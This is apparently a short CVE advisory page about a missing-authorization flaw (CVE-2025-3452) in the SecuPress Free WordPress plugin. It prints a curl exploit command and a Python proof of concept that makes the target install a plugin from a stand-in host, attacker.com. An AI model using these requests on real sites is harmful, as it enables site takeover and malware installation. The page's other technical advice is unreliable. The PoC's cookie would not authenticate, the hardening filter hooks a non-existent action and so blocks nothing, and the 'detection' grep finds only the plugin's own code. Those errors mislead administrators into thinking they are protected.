SecuPress Free (WordPress), Missing Authorization Vulnerability, CVE-2025-3452 (Critical)

How CVE-2025-3452 Works

The vulnerability exists in the `secupress_reinstall_plugins_admin_ajax_cb` function of the SecuPress Free WordPress security plugin (versions ≤ 2.3.9). Due to a missing capability check, authenticated attackers with Subscriber-level permissions can exploit this flaw via a crafted AJAX request. This allows unauthorized plugin installations, potentially leading to remote code execution (RCE), privilege escalation, or malware deployment. The lack of CSRF protection further increases the risk, enabling attackers to chain exploits.

DailyCVE Form

Platform: WordPress
Version: ≤ 2.3.9
Vulnerability: Missing Authorization
Severity: Critical
Date: 05/06/2025

What Undercode Say:

Analytics:

• Attack Vector: AJAX (admin-ajax.php)
• Privilege Escalation: Subscriber → Admin
• CVSS 4.0: 9.6 (Critical)
• Exploitability: Low complexity, no user interaction

Exploit Command (cURL):

curl -X POST 'http://target.com/wp-admin/admin-ajax.php' \
--data 'action=secupress_reinstall_plugins_admin_ajax_cb&plugin=malicious.zip'

PoC (Python):

import requests
target = "http://target.com/wp-admin/admin-ajax.php"
data = {"action": "secupress_reinstall_plugins_admin_ajax_cb", "plugin": "http://attacker.com/malicious.zip"}
requests.post(target, data=data, cookies={"wordpress_logged_in": "1"})

Mitigation:

1. Patch: Upgrade to SecuPress Free ≥ 2.4.0.

1. WAF Rule: Block unauthorized `admin-ajax.php` requests to `secupress_` actions.

3. WordPress Hardening:

add_filter('wp_ajax_secupress_', function() {
if (!current_user_can('install_plugins')) wp_die('Unauthorized');
});

Detection (Bash):

grep -r "secupress_reinstall_plugins_admin_ajax_cb" /var/www/html/

Impact: Full site compromise via arbitrary plugin installation.

References:

• Wordfence Advisory
• NVD CVE-2025-3452

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram